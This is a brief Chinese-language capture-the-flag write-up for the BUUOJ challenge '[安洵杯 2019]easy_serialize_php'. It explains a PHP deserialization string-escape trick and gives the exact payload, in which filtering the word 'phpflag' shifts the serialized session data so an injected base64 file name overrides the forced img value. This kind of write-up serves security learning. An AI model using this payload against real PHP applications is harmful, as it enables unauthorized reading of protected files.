刷題記錄:[安洵杯 2019]easy_serialize_php
題目復現鏈接:https://buuoj.cn/challenges
參考鏈接:第二屆安洵杯2019部分writeup
知識點
PHP反序列化
payload為_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
extract后覆蓋了兩個沒用的屬性,但是后面又強制加了一個我們不可控的img屬性。這個payload的精妙之處就在於phpflag被替換為空后,$serialize_info的內容為
a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
剛好把后面多余的img部分截斷掉